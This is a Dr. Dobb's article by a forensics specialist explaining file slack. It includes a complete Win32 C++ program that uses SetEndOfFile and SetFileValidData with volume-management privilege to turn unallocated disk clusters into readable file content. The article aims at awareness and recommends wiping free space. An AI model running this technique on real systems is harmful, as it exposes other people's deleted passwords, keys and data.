Dr. Dobb's is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them. Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.


Channels ▼
RSS

Beware of File-Slack Attacks


asp_template

Hard drives are dangerous things. The data they store never really goes away with absolute certainty, and the risk of data theft from nearly any area of a drive at any time is very real. When a file is deleted, the sectors formerly occupied by the file's allocated clusters, also known as allocation units, are marked as free, or unallocated. A cluster of sectors is the smallest unit of file allocation performed through normal OS file operations.

As a file grows in size, new clusters are allocated until the final cluster of the file is partially filled with data, leaving unused sectors and partially used sectors within the final cluster. These unused areas are known as "file slack," and the slack space contains whatever data happens to have been on the drive previously. This can include sensitive data such as passwords or encryption keys, whether written to the drive explicitly by software or swapped out to the drive as part of a swap file.

Flaws in software that copies files has been known to read beyond the logical end of a file and up to the physical boundary of the final cluster by mistake, transferring file slack from one place to another when the slack should be ignored by software that manipulates logical files. Whenever slack is copied as part of a file copy, an unknown quantity of potentially sensitive data is at risk of theft. For this reason, tools exist that will wipe file slack automatically as files are created or copied.

Data recovery of deleted or lost files from unallocated clusters requires little more than the execution of privileged code. A small number of Win32 API calls can be used in concert to create a new file and extend its physical size without writing any data, causing a file of the selected size to exist entirely as file slack. The slack can then be converted to content within the logical file, resulting in easy Win32 API-based access to unallocated drive space without requiring low-level calls by way of a device driver interface to accomplish similar free space data extraction. An example of carving such ambient data out of free space on a drive is shown in the following code.

// SetEndOfFileTheft.cpp

#define STEALCLUSTERS 10

#include <windows.h>
#include <stdio.h>

int main(int argc, char * argv[]) {
 char * sNULL = 0;
 DWORD dwSectorsPerCluster = 0, dwBytesPerSector = 0,
  dwNumberOfFreeClusters = 0, dwTotalNumberOfClusters = 0,
  dwWritten = 0;

 GetDiskFreeSpace(sNULL,&dwSectorsPerCluster,
     &dwBytesPerSector,&dwNumberOfFreeClusters,&dwTotalNumberOfClusters);

 HANDLE hToken, h;
 TOKEN_PRIVILEGES tp;
 LUID luid;

 OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hToken);

 if(!LookupPrivilegeValue(NULL, SE_MANAGE_VOLUME_NAME, &luid)) {
  printf("LookupPriv err: %u\n",GetLastError()); }
 else {
 tp.PrivilegeCount = 1;
 tp.Privileges[0].Luid = luid;
 tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
 if(!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES),
  (PTOKEN_PRIVILEGES) NULL, (PDWORD) NULL)) {
  printf("AdjustToken err: %u\n", GetLastError()); }
 else {
  h = CreateFile("datatheft.dat",GENERIC_WRITE,FILE_SHARE_WRITE,0,CREATE_ALWAYS,0,0);
  if(h) {
  if(SetFilePointer(h,dwBytesPerSector * dwSectorsPerCluster *
     STEALCLUSTERS,0,FILE_BEGIN) == INVALID_SET_FILE_POINTER) {
  printf("SetFilePointer failed: %u\n",GetLastError()); }
  SetEndOfFile(h);
  // steal data from slack by setting new logical end of file to length of file slack
  // (bytes per cluster * STEALCLUSTERS) minus 1 (to avoid exceeding physical eof)
  if(!SetFileValidData(h,dwBytesPerSector * dwSectorsPerCluster * STEALCLUSTERS - 1)) {
  printf("Error calling SetFileValidData: %u\n",GetLastError()); }
  else {
  printf("File slack space sector data theft successful.\n"); }}}
 CloseHandle(h);
 CloseHandle(hToken); }
 return 0;
}

A call to GetDiskFreeSpace provides simple drive geometry, size of each sector in bytes, and size of each cluster in number of sectors. As each new file is created on a sector or cluster boundary, which must end on such boundary as well, attempts to recover or steal data purposefully by creating a new empty file and expanding its size can be sure to get everything available simply by adding multiples of cluster size. The key to converting file slack into part of a logical file is to call the SetFileValidData function, which requires the current process token to have SE_MANAGE_VOLUME_NAME privileges.

A call to LookupPrivilegeValue followed by AdjustTokenPrivileges ensures that a security context that is already granted the necessary privilege actually has the privilege enabled prior to attempting the alteration of logical file parameters. Creating a file through a call to CreateFile and then setting the file pointer in a call to SetFilePointer using a multiple of the drive's geometry sets up for modifying the physical size of the file without writing data to the drive. To effect a file size growth from FILE_BEGIN to the computed new ending cluster, a call to SetFilePointer is followed by SetEndOfFile, which actually modifies the file's physical size.

To complete the conversion of data from the file's new slack to the file's logical body, a call to SetFileValidData is made. Once the slack becomes logical file space, "theft" of the data becomes as easy as using any logical file copy program. The data may or may not be of any value, and a hex editor will likely be necessary to view the full content of the logical file in order to extract just data of interest. Though this approach to carving data out of unallocated clusters is crude compared to any actual data recovery tool, the ease with which nearly any data physically present in free space on a drive can be accessed using only Win32 API calls helps to further build awareness of the need for better data protection. Wiping a drive's free space so that file slack is always meaningless data in the creation of any logical file is the only way to ensure that such data carve techniques are unsuccessful in accomplishing real-world data theft.


Jason Coombs is Director of Forensic Services for PivX Solutions Inc. (NASDAQ OTCBB: PIVX), a provider of security solutions, computer forensics, and expert witness services. Reach him at [email protected].



Related Reading


More Insights






Currently we allow the following HTML tags in comments:

Single tags

These tags can be used alone and don't need an ending tag.

<br> Defines a single line break

<hr> Defines a horizontal line

Matching tags

These require an ending tag - e.g. <i>italic text</i>

<a> Defines an anchor

<b> Defines bold text

<big> Defines big text

<blockquote> Defines a long quotation

<caption> Defines a table caption

<cite> Defines a citation

<code> Defines computer code text

<em> Defines emphasized text

<fieldset> Defines a border around elements in a form

<h1> This is heading 1

<h2> This is heading 2

<h3> This is heading 3

<h4> This is heading 4

<h5> This is heading 5

<h6> This is heading 6

<i> Defines italic text

<p> Defines a paragraph

<pre> Defines preformatted text

<q> Defines a short quotation

<samp> Defines sample computer code text

<small> Defines small text

<span> Defines a section in a document

<s> Defines strikethrough text

<strike> Defines strikethrough text

<strong> Defines strong text

<sub> Defines subscripted text

<sup> Defines superscripted text

<u> Defines underlined text

Dr. Dobb's encourages readers to engage in spirited, healthy debate, including taking us to task. However, Dr. Dobb's moderates all comments posted to our site, and reserves the right to modify or remove any content that it determines to be derogatory, offensive, inflammatory, vulgar, irrelevant/off-topic, racist or obvious marketing or spam. Dr. Dobb's further reserves the right to disable the profile of any commenter participating in said activities.

 
Disqus Tips To upload an avatar photo, first complete your Disqus profile. | View the list of supported HTML tags you can use to style comments. | Please read our commenting policy.